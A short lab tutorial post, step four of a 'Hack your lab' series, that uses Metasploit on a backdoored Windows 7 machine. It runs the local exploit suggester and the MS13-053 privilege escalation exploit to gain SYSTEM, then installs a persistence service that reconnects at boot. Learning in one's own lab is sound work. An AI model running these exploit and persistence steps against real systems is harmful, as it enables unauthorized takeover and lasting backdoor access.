Hack your lab – Step 4 – Let’s get Admin!

      Comments Off on Hack your lab – Step 4 – Let’s get Admin!

When you have completed step 1 – 3 we have a situation where we have a backdoor connection to a windows 7 machine, under a standard user account. Now it’s time to see if we can get admin by using an exploit.

run this command from the meterpreter console:

use post/multi/recon/local_exploit_suggester
show options
set session 1
run

 

 

this script checks on the windows 7 machine which possible local privilege escalation methods will succeed, very handy for a fast intervention.

Let’s try this one:

https://docs.microsoft.com/en-us/security-updates/securitybulletins/2013/ms13-053

use exploit/windows/local/ms13_053_schlamperei
set session 1
exploit

 

You’ll see that there is a new session created (verify this by sessions -l)

connect to your new backdoor session by using sessions -i <newID> and after connection type

getuid

Is everything is correct you will see that you are SYSTEM on the windows 7 machine. Of course you want to have this forever, you can use the command

run persistence

this will install a service which will connect when the system starts.